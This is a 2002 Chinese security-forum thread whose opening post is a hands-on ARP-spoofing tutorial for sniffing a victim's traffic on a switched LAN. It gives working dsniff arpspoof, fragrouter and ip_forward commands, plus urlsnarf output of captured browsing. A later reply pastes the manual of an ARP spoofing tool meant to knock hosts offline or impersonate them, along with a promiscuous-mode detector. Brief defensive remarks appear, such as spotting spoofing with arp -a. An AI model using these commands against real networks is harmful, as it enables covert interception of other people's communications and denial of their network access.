交换环境下的Sniffer

>> 欢迎您， 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助

首页

小榕软件实验室

刀光雪影

交换环境下的Sniffer

■ 回复数：35　◆ 点击数：1292

将此页发给您的朋友

作者

主题: 交换环境下的Sniffer ( 页: 1 2 3 )

回复 | 收藏 | 打印 | 篇末

小榕

级别：管理员
威望：0
经验：2
货币：2638
体力：

来源：211.161.43.*
总发帖数：621
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

通常在局域网环境中，我们都是通过交换环境的网关上网的，在交换环境中使用NetXray或者NAI Sniffer一类的嗅探工具除了抓到自己的包以外，是不能看到其他主机的网络通信的。

但是我们可以通过利用ARP欺骗可以实现Sniffer的目的。

ARP协议是将IP解析为MAC地址的协议，局域网中的通信都是基于MAC的。

例如下面这样的情况：

在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网的，假定攻击者的系统为192.168.0.24，他希望听到192.168.0.29的通信，那么我们就可以利用ARP欺骗实现。

1、    首先告诉192.168.0.29，网关192.168.0.1的MAC地址是192.168.0.24

2、    告诉192.168.0.1，192.168.0.29的MAC地址是192.168.0.24。

这样192.168.0.29和192.168.0.1之间的数据包，就会发给192.168.0.24，也就是攻击者的机器，这样就可以听到会话了。

但是这么做的有一个问题，192.168.0.29发现自己不能上网了，因为原来发给192.168.0.1的数据包都被192.168.0.24接收了，而并没有发给网关192.168.0.1。

这时候192.168.0.24设置一个包转发的东西就可以解决这个问题了，也就是从192.168.0.29收到的包转发给192.168.0.1，在把从192.168.0.1收到的包发给192.168.0.29。这样192.168.0.29根本就不会意识到自己被监听了。

具体实现：

1、    欺骗192.168.0.29，告诉这台机器网关192.168.0.1的MAC地址是自己(192.168.0.24)。
[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
………………………………..
这时候对192.168.0.29的ARP欺骗就开始了。

2、    欺骗192.168.0.1，告诉网关192.168.0.29的MAC地址是自己(192.168.0.24)。
[root@Linux dsniff-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
其实在这个时候192.168.0.29是可以发现的自己被欺骗了。在CMD下面使用ARP –a命令：
C:\WINNT>arp -a

Interface: 192.168.0.29 on Interface 0x1000003
Internet Address Physical Address Type
192.168.0.1 00-50-56-40-07-71 dynamic
192.168.0.24 00-50-56-40-07-71 dynamic
两个IP地址的MAC地址居然是一模一样的！不过很少有人会这么做:-)。

3、    设置一个包转发
[root@Linux fragrouter-1.6]# ./fragrouter -B1
fragrouter: base-1: normal IP forwarding
在这之前别忘了首先需要打开包转发的功能
[root@Linux /proc]# echo 1 >/proc/sys/net/ipv4/ip_forward

万事具备，可以开始SNIFFER了。
例如想看看192.168.0.29在浏览什么地方：

[root@Linux dsniff-2.3]# ./urlsnarf
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
Kitty - - [18/May/2002:20:02:25 +1100] "GET http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7 HTTP/1.1" - - "http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Kitty - - [18/May/2002:20:02:28 +1100] "GET http://www.ezboard.com/ztyles/default.css HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Kitty - - [18/May/2002:20:02:29 +1100] "GET http://www1.ezboard.com/spch.js?customerid=1147458082 HTTP/1.1" - - "http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

当然也可以知道其他………:-)

[ 此消息由小榕在 2002-05-19.16:03:54 编辑过 ]

----------------------------------------------------------
相爱的时光太短，遗忘的过程太长。也许我们只是人生轨迹的一个交点

编辑　

删除　

发表于 2002-05-19.16:01:28　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

榕哥，在WIN2K/NT下能实现吗，是不是有新的ARP欺骗TOOL要发步

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-05-19.16:09:56　

IP: 已记录

随风而至

级别：中级站友
威望：0
经验：0
货币：284
体力：

来源：61.174.197.*
总发帖数：31
注册日期：2002-03-05

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

太深澳了，看不懂，看来真要好好学习了。

编辑　

删除　

发表于 2002-05-19.16:10:48　

IP: 已记录

ybc11

级别：高级站友
威望：0
经验：0
货币：669
体力：

来源：山东
总发帖数：171
注册日期：2002-05-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

容哥如果用双网卡的话 linux下怎么用程序实现接收和转发（一个接收，一个转发），有代码更好，能解释一下嘛（重点是转发的规则怎么实现）

编辑　

删除　

发表于 2002-05-19.16:14:44　

IP: 已记录

小榕

级别：管理员
威望：0
经验：2
货币：2638
体力：

来源：211.161.43.*
总发帖数：621
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

有这个想法，准备写一个NT/2000环境下的ARPSNIFFER。

----------------------------------------------------------
相爱的时光太短，遗忘的过程太长。也许我们只是人生轨迹的一个交点

编辑　

删除　

发表于 2002-05-19.16:25:24　

IP: 已记录

czh

级别：精灵
威望：0
经验：3
货币：647
体力：

来源：211.98.136.*
总发帖数：435
注册日期：2002-01-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

太好了，我们等你啊，榕哥

----------------------------------------------------------
czh
MSN:czh76821@msn.com
yahooID:czh_21

编辑　

删除　

发表于 2002-05-19.16:31:21　

IP: 已记录

阿文

级别：光明使者
威望：3
经验：8
货币：3882
体力：

来源：61.132.208.*
总发帖数：1412
注册日期：2001-10-21

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

厉害

----------------------------------------------------------

君住长江头
我住长江尾
日日思君不见君
共饮一江水

编辑　

删除　

发表于 2002-05-19.17:17:31　

IP: 已记录

ghosts 帅哥哦

级别：本站元老
威望：0
经验：0
货币：5962
体力：

来源：61.143.252.*
总发帖数：1661
注册日期：2002-03-14

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

网络监听需要硬条件和软条件！
硬条件就是你监听的对象必须和你机器物理上在同一网段,同一条物理通道,(也就是说必须同一个集线器)
软条件嘛...

----------------------------------------------------------
狙击者的前身就是武者：比利

编辑　

删除　

发表于 2002-05-19.17:48:06　

IP: 已记录

wendy

级别：精灵王
威望：0
经验：0
货币：1991
体力：

来源：bbs.ccxx.net
总发帖数：985
注册日期：2002-03-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

同一个交换机或路由器行不？

----------------------------------------------------------
hacker精神只是从各行各业中的最优秀精神的结晶，以此更正大家对它的认识！

欢迎到bbs.wwenglish.org

交流英语或网络技术

编辑　

删除　

发表于 2002-05-19.18:02:29　

IP: 已记录

小榕

级别：管理员
威望：0
经验：2
货币：2638
体力：

来源：211.161.43.*
总发帖数：621
注册日期：2001-04-13

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

注意是交换环境下，所以同一个交换机或者路由就可以了。

----------------------------------------------------------
相爱的时光太短，遗忘的过程太长。也许我们只是人生轨迹的一个交点

编辑　

删除　

发表于 2002-05-19.18:15:22　

IP: 已记录

tommy

级别：精灵
威望：0
经验：7
货币：563
体力：

来源：上海
总发帖数：583
注册日期：2002-02-08

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

看来局域网又要饱受摧残了
容哥真的很厉害！

----------------------------------------------------------
我爱你们tommycool.51.net /tommywu.2HU.ORG

编辑　

删除　

发表于 2002-05-19.18:23:55　

IP: 已记录

刺

级别：长老级
威望：1
经验：0
货币：1693
体力：

来源：202.117.35.*
总发帖数：930
注册日期：2002-01-19

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

呵呵，支持：）

----------------------------------------------------------
你们到底他妈的有什么不爽的？

编辑　

删除　

发表于 2002-05-19.18:33:08　

IP: 已记录

永远的FLASH 帅哥哦

级别：刀光雪影版主
威望：3
经验：1
货币：5852
体力：

来源：江苏
总发帖数：2264
注册日期：2002-02-11

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

希望能超过NexXray!

----------------------------------------------------------
H4技术组：http://www.h4h4.com

编辑　

删除　

发表于 2002-05-19.20:14:25　

IP: 已记录

小蔡

级别：精灵王
威望：0
经验：27
货币：3111
体力：

来源：四川
总发帖数：439
注册日期：2002-01-28

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

一定超过netxray

编辑　

删除　

发表于 2002-05-19.20:28:21　

IP: 已记录

netfox 帅哥哦

级别：圣骑士
威望：0
经验：12
货币：504
体力：

来源：山东
总发帖数：240
注册日期：2002-03-18

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

看这个，用这个配合包转发行不行？
ARPKiller 使用手册
DigitalBrain 2001/11/08
目录:
1. ARP协议简介，及其在网络安全中的应用;
2. ARPKiller使用说明;

正文:

1. ARP协议简介，及其在网络安全中的应用
ARP: Address Resolution Protocol ,地址解析协议
故名思意，就是用地解地址的协议:") ,废话！，具体点就
是将网络层（IP层，也就是相当于ISO OSI 的第三层）地址
解析为数据连接层（MAC层，也就是相当于ISO OSI的第二层）
的MAC地址。分析一下整个广域网和局域网的结构：广域网用
具有层次体系的IP协议来进行通讯，可是具体到各个局域网
又如何来辨别各个主机呢？没错！就是通地MAC地址。设想有
两台主机A(192.168.0.1:abc111111111)和B(192.168.0.2:
abc222222222)，当主机A想与主机B进行通讯时，A只知道B的
IP地址是192.168.0.2,当数据包封装到MAC层时他如何知道B
的MAC地址呢，一般的OS中是这样做的，在OS的内核中保存一
分MAC地址表(arp -a可以看见这个表的内容)，表中有IP和
MAC地址的对应关系，当要过进行通讯时，系统先查看这个表
中是否有相关的表项，如果有就直接使用，如果没有系统就会
发出一个ARP请求包,这个包的目的地址为ffffffffffff的广播
地址，他的作用就是询问局域网内IP地址为192.168.0.2的主机
的MAC地址，就像是A在局域网中喊"我在找一个IP地址为192.168
.0.2的主机，你的MAC地址是多少，听到了请回话！，我的MAC
地址是abc111111111。"，随后所有主机都会接收到这个包，但
只有IP为192.168.0.2的B才会响应一个ARP应答包给主机A,他
说"你个老色鬼！，找我有啥事吗，我的MAC地址是abc222222222
",好这下主机A就知道B的MAC地址了，于时他就可以封包发送了
，同时主机A将B的MAC地址放入ARP缓冲中，隔一定时间就将其
删除，确保不断更新。（注意，在这个过程中，如果主机A在发
送ARP请求时，假如该局域网内有一台主机C的IP和A相同，C就会
得知有一台主机的IP地址同自已的IP地址相同，于时就蹦出一个
IP冲突的对话筐：）。与ARP相对应的还有一个协议RARP:Reverse
Address Resolution Protocol，反向地址解析协议，该协议主
要用于工作站模型动态获取IP的过程中，作用是由MAC地址向服务
器取回IP地址。
明白了ARP的工作原理之后就可以大刀阔斧的玩MAC了，:")
设想1：既然一个主机接收到与自已相同IP发出的ARP请求就会
蹦出一个筐来，哪么要是我伪造主机X的IP向局域网发ARP请求，
或都是发个不停，同时自已的MAC也是伪造的，哪会怎么样....
设想2：既然主机Y接收到一个ARP请求包后就会把这个包中的信
息放入到ARP表中，哪么我以一个局域网网关或都任意一台不想让
Z访问的机子IP的身份，同时以一个不存在的MAC向Z发送ARP应答
报文会怎样？，，，不想说主机Z甭想上网或都是访问哪台机子了
:")
设想3：网卡既可以工作在正常模式（只能接收到目的MAC为ffff
ffffffff的广播包或都是目的MAC与网卡MAC相同的包），也可以工
作在混杂模式（网卡不检查目的MAC接收的有的包,sniffer就是用
这种原理来窃取网络上的数据的），如何来鉴别主机的网卡处于
什么模式呢？然而一般的OS对某种特殊类型的MAC广播包(目标地
址为fffffffffffe)在正常模式下是拒绝的，而在混杂模式下无条
件的接收，哪么我们可以利用这种特殊类型的MAC地址广播包来测试
一台主机的网卡是否处于混杂模式，如果这台机子返回了ARP应答包
说明这台主机处于混杂模式，相反则处于下常模式。
设想4：与之相关的设想太多了，留给你自已想吧...

2. ARP协议在网络安全中的应用简介
基于以上几个设想，我做了这个工具，用PACKET32库来处理
包的发送与接收。
该工具有两个模块，一个是sniffer检测，主要使用设想3，
另一块是ARP欺骗工具，主要用了设想1与设想2，还可以由你自
行扩展。
Sniffer检测:输入检测的起始和终止IP，单击开始检测就可以
了，检测完成后，如果相应的IP是绿帽子图标，说明这个IP处
于正常模式，如果是红帽子则说明这个网卡处于混杂模式。
Arp欺骗(冒充IP)：选择发送请求包，输入目的起始和终止地址
，如果输入要冒充的IP，再填上一个假的MAC，就可以发送了，
当然这个过程中可以设为循环 :") 呵呵！别太损了！
Arp欺骗(欺骗IP)：选择发送应答包，输入被欺骗主机的IP和他
的MAC地址再输入原主机的IP，目的地址随便啦，不存在就行
（也可以指向你的IP：）好了，单击发送就行了！这个他惨了！
好了，我也饿得慌了，下回再写吧！~~~~~~~~ 当-当-当！吃饭去！
差点忘了！多多关照www.ishacker.com 啊！

----------------------------------------------------------
有约不来过夜半，
闲敲棋子落灯花。

编辑　

删除　

发表于 2002-05-19.20:41:30　

IP: 已记录

马虎

级别：新手上路
威望：0
经验：0
货币：112
体力：

来源：湖北
总发帖数：4
注册日期：2002-05-18

查看　

邮件　

主页　

消息　

引用　

复制　

下载　

55555~~~~~~~~~~~，我看不懂啊，我是不是很笨？我的自信受到了严重挫折。

编辑　

删除　

发表于 2002-05-19.20:49:34　

IP: 已记录

选择回复

快速回复主题：	>>>高级模式
	用户名：没有注册？　密码：忘记密码？
记住密码 HTML语法禁止IDB代码禁止表情字符	[按 Ctrl+Enter 快捷键可直接提交帖子]
投票评分：	共 1 票

所有时间均为: 北京时间

↑TOP [第 1 2 3 页]